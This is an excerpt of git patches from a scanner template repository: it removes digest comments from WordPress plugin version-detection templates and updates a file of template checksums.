@@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207a8326d142a0f498238424595b10ead87f3c747a07d4a42d307a5efe21de471c02200ccb8d67d081a5ff620885bdb16974bf8da25bdd95e6af3ed52b0d859e225040:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 5dbe2fb32c..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201131c2f94951df8286bb3401fe404c9f509550d23c98d513f15f237d2344edd602205b94a96428eec4b6fe4baa22d7a332d476ba3dfcc59f97c16f86e5c2fc947560:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 24c636823f..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b0b02a86bc93876f19852589bd05a4bd31e8c4998e706e547803b89fca3d413902205a180c9bb5b91bdffd1d7dd77d0f0bdee2c2e53033a2eec4ef856eac0a74fa19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 0a75000040..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009d28a576ead0122b3a1c39e70a075d8ba86ea53f5a26f8ff10cd37fb3e35acec022100dc6328995a5cde53ace0af6c8ce9e6c5830e9410c6b367d87ff99cf972a30d9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index d1cb6275d9..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022022a652e67be791ec02ed035c833079b7a001b4045857cbf1f74c1bf21cb500170221008af74cbe1209863b1ccebdd8eab06a799d110f73c403eaa15315543acb80f2e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index b782d319bb..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220589f411b35afa536a44e36bee7477c2272cbf5ed105d38bcc46b1676646207b202210091c87e96db77cd96f63fa25cc8c5807e648867ca8e875ab069250324579b604c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 0b190874a6..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205bc31c26325c64db4caadece16251729904ad01936b19147c1a4d69e13f0c960022015eef5f155e11c85b8a6486a6fa0f33b936a39642dd3576bee7e25cbdd7ca988:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 923a71087b..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205ab7d7ce1cfbf2a5e4d8803e7d18634bcee35e3c7770f404eb37a1c070db99fd022032538f568a7dbc6e249049beef2398d744502e206f7b9da6d2a699b34be9b8ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 1840010670..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220343e3a19dc1b7271e59dd816b0c4e8dab9f7e62f026491db19e1a7b189497efe022060a91c34f8402cfe77b8f5698354dcbc7be988ecf2d1b301dbfa79c8177d763f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 5f0c127fa0..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201657f853008b67c294360756034e19fba9a098779fefe2f5f4c20930145601ee0220701da9a8b3bd19e7110fa5a8a78c1e62905d06f26ec13ea90c217baaf5b2d81d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a7923403632da4aa70f596b2d15e7269f5d659cb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 22 Jul 2024 07:33:57 +0000 Subject: [PATCH 1488/1841] Auto Generated Templates Checksum [Mon Jul 22 07:33:57 UTC 2024] :robot: --- templates-checksum.txt | 410 ++++++++++++++++++++--------------------- 1 file changed, 205 insertions(+), 205 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3d3973bb8a..f1672fdb83 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -886,7 +886,7 @@ helpers/wordpress/plugins/simple-custom-post-order.txt:106ca8d85638866255a70e746 helpers/wordpress/plugins/simple-history.txt:ee49c41e728b7af9b4fa9de669951863a79a98b1 helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd helpers/wordpress/plugins/siteguard.txt:92c6bf6bc1f97136cb8bbe1a936cc4289dff178e -helpers/wordpress/plugins/siteorigin-panels.txt:95d3da7ccba2614dea34b493903fa307600e3a01 +helpers/wordpress/plugins/siteorigin-panels.txt:bc7fa19bc30f09a5461e289a3ac43834d448a889 helpers/wordpress/plugins/smart-slider-3.txt:ddd091c3f02b8a56a7a2d9a4a0f8387a12a347f9 helpers/wordpress/plugins/so-widgets-bundle.txt:6d445f8f926ce0b81a2d46eb8ce60af388326266 helpers/wordpress/plugins/ssl-insecure-content-fixer.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 @@ -7306,229 +7306,229 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:0856efef2598cea5d63c24e0da1c00a7dcc257db -http/technologies/wordpress/plugins/add-to-any.yaml:fbfa348253efcce01f62b663b1540d2afa6cf33a -http/technologies/wordpress/plugins/admin-menu-editor.yaml:f25d15e68b4e1f9d7cbbc5fce86ea936360332ca +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:0e51e8a3f854d361a81dd965a25e30015a69c253 -http/technologies/wordpress/plugins/akismet.yaml:c1d0b8b65a0738fcd20dc5f6e50553cbb6f8abc8 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:9cc76c4fdbf80948340fca87f76589131c08b945 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:1ef425cdd4999ef46c456cad27caf591979c057f -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:daeef210b50158c2224d4731f84539ea3fcf1de3 -http/technologies/wordpress/plugins/amp.yaml:3f99b08116044c1fc047fb4a7ff30c2556a4c070 -http/technologies/wordpress/plugins/antispam-bee.yaml:8618198fc3ffec08696ef2c1b299d8837b0105c3 -http/technologies/wordpress/plugins/astra-sites.yaml:152cebb4011d620c650904d9f2cfc25a13e24a31 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:cdb66388fb527e5ced9d8e6728ff9eff89a5e0b4 -http/technologies/wordpress/plugins/backwpup.yaml:676f3e146edb7486f9e87a948e1336c0314a3bf8 -http/technologies/wordpress/plugins/better-search-replace.yaml:58f777b64bc860aa9db448f7d58ba23893ae8986 -http/technologies/wordpress/plugins/better-wp-security.yaml:e2473bbe97314da5aed1132d1347adc47c5ee6b4 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:4a59f1103678aebf98c279661ef539dbc568233a -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:cdfd040359b605fe6e40166fea4d52e6e1068155 -http/technologies/wordpress/plugins/breeze.yaml:f002be0282e9e182b0a5e39d4c674a15e22e47aa -http/technologies/wordpress/plugins/broken-link-checker.yaml:989de8d19c4513e0b2a7997e858b110cfdcc2d64 -http/technologies/wordpress/plugins/chaty.yaml:c0c6b1cd8a370742851dd65cbff0c3a5e73e91e0 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:e42d969fd4d45135a6a7b09cd2787097895a2638 -http/technologies/wordpress/plugins/classic-editor.yaml:f0814109c8200d2c61fd785ab7f19ae255bf47a6 -http/technologies/wordpress/plugins/classic-widgets.yaml:35cd2b1bf07b5d089ad1c6e4870672a6cbd843a2 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:c30daefcfc1abf678c0ed64b114fe7319f30c64e +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:0b7e40bedb657e09ffbe8053ef52403bff89f521 -http/technologies/wordpress/plugins/coblocks.yaml:3b2ae6915e270dbe89c086c2a6c366ae4743b5a4 -http/technologies/wordpress/plugins/code-snippets.yaml:fa89b3b587bb0bd044e031b57e0722f45ecb540d -http/technologies/wordpress/plugins/coming-soon.yaml:52a1862e2466d7197100ee96a84050ff4b379560 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:da9ae925a05095689541edf5ea809b8235c86485 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:c0d909965d9601a37c90fb5b6bde186da8c494d4 -http/technologies/wordpress/plugins/contact-form-7.yaml:a0d636b5426008030b6eb6be9edd8ad2490a3c46 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a90807808101f96c70aa9c3b861d26d053ba135d -http/technologies/wordpress/plugins/cookie-law-info.yaml:8dba5c592bee8266333023ed098fcbda0cf9154f -http/technologies/wordpress/plugins/cookie-notice.yaml:6454e3866a0406fd47373ca22bbcb978645b5ec7 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:31841f6631164782746109cebccea978e6564627 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:a133dd359ca458ebef58acbbe9094eecc4e1d9b7 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:1d041cc2d6e6dca565a3ed02664a77a1c74c84f4 -http/technologies/wordpress/plugins/custom-css-js.yaml:9f2054cfc1872eb28c6b9b2555d84b48d30afbd2 -http/technologies/wordpress/plugins/custom-fonts.yaml:7bd3fd05cfd5856a47a2e6a2ad5ca0e01e8f0b59 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:bb474b2b336d39a108b1e2803ffb2d4209bdfa1c -http/technologies/wordpress/plugins/disable-comments.yaml:42d28abfec4a38537eb701d87ca3c3bf0da1dead -http/technologies/wordpress/plugins/disable-gutenberg.yaml:0fabd4ef48ba1c67ef8b73b68576ff9217d888f5 -http/technologies/wordpress/plugins/duplicate-page.yaml:0111b6e5caa4466bcdf358d3213eaa1d5a311632 -http/technologies/wordpress/plugins/duplicate-post.yaml:e4dc9f85cb35641d8465564d3fa27798f12565ff -http/technologies/wordpress/plugins/duplicator.yaml:e685882e6c4220f9f9931d274f646ff0627dd1cb -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:46b763d3743930a30739e2509656d02687b6aa15 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:26fc31bf37f0da80bb4969e917aec6a52b5e867e -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:c39b85a5ebcf236113658d1ada833a021bf575e6 -http/technologies/wordpress/plugins/elementor.yaml:31c82ed8efa9b7ad304b5f9aaaf1637c72319e47 -http/technologies/wordpress/plugins/elementskit-lite.yaml:09dd48d6909a6fff4fda4d93bcae8cd244d6bfd9 -http/technologies/wordpress/plugins/enable-media-replace.yaml:9db0cd820399c3c4c327b49a9528a35c7d4ccc60 -http/technologies/wordpress/plugins/envato-elements.yaml:18efde9dc5aa10045102f41ba08c6004cefab972 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:84294ba5cb546b59cf3e19ba75f4889aee274ad4 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:db05d3357b89603e3f10384fd8eefdab8e6cb077 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:3c3e1c79a029bd084f33fffae964563881769d11 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:eeeed819cba20622753c8ae61171dbd95a9ba57a -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:2487d66404ec9f55f37da741750c55a6e2c146b7 -http/technologies/wordpress/plugins/flamingo.yaml:b23f9d9ce775edc4d4e54b47e93cb8dd1425b718 -http/technologies/wordpress/plugins/fluentform.yaml:fb4847ea7071a8e250dd880caf85bd1c0a967b79 -http/technologies/wordpress/plugins/font-awesome.yaml:9f4eca367af464c050798f8527ef0d58bb5692d4 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:63b03a41ff6e5050fe882107002c8e3fb19edcd7 -http/technologies/wordpress/plugins/formidable.yaml:f30facfea24779cceb492efd3eb0eb988a0ef9d6 -http/technologies/wordpress/plugins/forminator.yaml:e20a2c6102007f347e66cdbe1210e1a56f3d4ecf -http/technologies/wordpress/plugins/ga-google-analytics.yaml:3bb1dec4d54556ea6d4515c51470261c5ee8dbbb -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:1d6eac1e825c190ee5e1aa5d62141dad5403feee -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:492217c9c744aeb35652d5343bfadc1afb12c230 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:5ee3272a2d12c6b6a17973113eee46d1abdce9cd -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:a2a9d74f6679ad1e6c11559477cc63d2537a9066 -http/technologies/wordpress/plugins/google-site-kit.yaml:e7f32b648664124b124715f792032a52f5088334 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:bf5805c3830e82cb0c960b40cc4eae1e956fb3bf -http/technologies/wordpress/plugins/gtranslate.yaml:ad99c7997852da89869b362fa1dd95d69f96ce0d -http/technologies/wordpress/plugins/gutenberg.yaml:04484808aeeb473fbc5023ff2afc9be5f9408d03 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:efc1b4c6edaeb1933bca1a1401b4de7362443a01 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:3a29c372ecc02b927d25283d52273f231358f882 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:f6d9ebd11c9a0e1d4db03101b901287006071391 -http/technologies/wordpress/plugins/header-footer.yaml:b6730f0e5d96f2054ee359655b15376a8bc42482 -http/technologies/wordpress/plugins/health-check.yaml:5e652e93dd5c057fc531b3c7fbdf18f07510be6d -http/technologies/wordpress/plugins/hello-dolly.yaml:96025bb0fece33f06b263eb4e594aa0562f49aaa -http/technologies/wordpress/plugins/host-webfonts-local.yaml:8d90228ecd8909e1a174b383acf2c3b6fa950022 -http/technologies/wordpress/plugins/hostinger.yaml:ca081d88279bcd74f14085472be61ce3ce309525 -http/technologies/wordpress/plugins/image-optimization.yaml:47d6a040f58db34586669c5f1d517c7aad86b90d -http/technologies/wordpress/plugins/imagify.yaml:fc9acd67a97a8d6cdcf95dbd9e27bdceeb0447dc -http/technologies/wordpress/plugins/imsanity.yaml:3dd09d57bc13d8afd5d81f63b25caeb4e138f7d8 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:cda1754dea8eb5c13811b09b605426f6be6353de -http/technologies/wordpress/plugins/instagram-feed.yaml:0550c86f025f1221afe08e5011a6d855d9ae378f -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:6cdfb366b63975731c26e2c5e49dba042f678575 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:891ad11b58a728f86211d29350086214e377bd76 -http/technologies/wordpress/plugins/jetpack.yaml:1ffa5619d63b63f917fe0db6b6a86c0dab56bea1 -http/technologies/wordpress/plugins/kadence-blocks.yaml:d59aabdace48c3e88d1c847d05023d90cd25382c -http/technologies/wordpress/plugins/kirki.yaml:8abd2d537cbd3c4a41596b4599d5f444948c501d -http/technologies/wordpress/plugins/leadin.yaml:5a7f21ffdf91c8e87a211b35b48f9c27aeb32368 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:608a51a165610650f0ed707df8565dc498b01883 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:f4d8c2851c12f7a854aaf69d547ac324349da461 -http/technologies/wordpress/plugins/litespeed-cache.yaml:307bbe3f8026b581418ecacba5461a8ff88d1230 -http/technologies/wordpress/plugins/loco-translate.yaml:7d344ea3a35f1e7e3ff6dbb04a6665eaeb6fc1d6 -http/technologies/wordpress/plugins/loginizer.yaml:0406561ce094b0e03c7271151e257a2f55036bfa +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 